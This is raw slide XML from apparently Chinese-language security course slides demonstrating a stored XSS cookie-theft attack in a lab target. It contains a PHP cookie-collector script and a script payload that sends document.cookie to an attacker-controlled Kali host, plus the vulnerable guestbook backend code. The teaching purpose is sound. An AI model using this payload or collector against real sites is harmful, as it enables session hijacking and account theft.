              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 root@Kali:~# vim   /var/www/html/cookie.php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 &lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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        $cookie = $_GET['cookie'];</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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        $log = fopen("cookie.txt","w");</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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        fwrite($log,$cookie."\n");</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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        fclose($log);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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 ?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1524000"/>
            <a:ext cx="5219700" cy="4246245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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第二步：在受攻击的主机的页面内注入XSS的存储型漏洞，其相关的执行代码如下：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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&lt;script&gt;window.open('http://10.10.10.128/cookie.php?cookie='+document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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其中10.10.10.128为Kali的IP。接下来是清除之前植入的XSS代码，这里由于前端的页面对输入框有字数限制，这里先改大一些，其结果如图10-22所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 22"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="1371600"/>
            <a:ext cx="6206490" cy="4667250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7084060" y="6172200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-22 XSS存储型代码结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="9773285" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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成功注入后，就会跳转至Kali的cookie.php页面用于收集用户的cookie值。结果如图10-23所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 23"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3048000"/>
            <a:ext cx="6943725" cy="642620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3886200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-23 具体的浏览器地址中的cookie值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="9773285" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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第三步：靶机点击被植入了XSS代码的页面就将自己的cookie提交给了Kali，注意，对于弹出的窗口，要允许其弹出，要不然不会提交自己的cookie，具体如图10-24所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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3581400" y="5791200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-24 靶机执行结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="图片 24"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2759075" y="2538730"/>
            <a:ext cx="5379720" cy="3093720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="10482580" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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一旦允许，就会将自己的cookie上传给Kali的/var/www/html/cookie.txt内。此时 ，Kali就会生成一个存储cookie的文件，其内容存储的就是user用户的本地cookie。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>结果如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10-25.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 25"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2691130"/>
            <a:ext cx="6485890" cy="2196465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="5039995"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-25 查看相关cookie文件和内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="10482580" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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验证，可见与Kali获取的cookie是一致的。结果如图10-26所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2209800"/>
            <a:ext cx="7088505" cy="3198495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5715000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-26获取得到cookie值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1371600"/>
            <a:ext cx="10482580" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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可以顺利的拿到cookie了，就完成了相关的渗透。查看低安全级别的后台代码。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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 if(isset($_POST['btnSign']))</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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    $message = trim($_POST['mtxMessage']);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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   $name    = trim($_POST['txtName']);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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      // Sanitize message input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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   $message = stripslashes($message);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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   $message = mysql_real_escape_string($message);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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      // Sanitize name input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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   $name = mysql_real_escape_string($name);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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     $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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      $result = mysql_query($query) or die('&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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    }</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
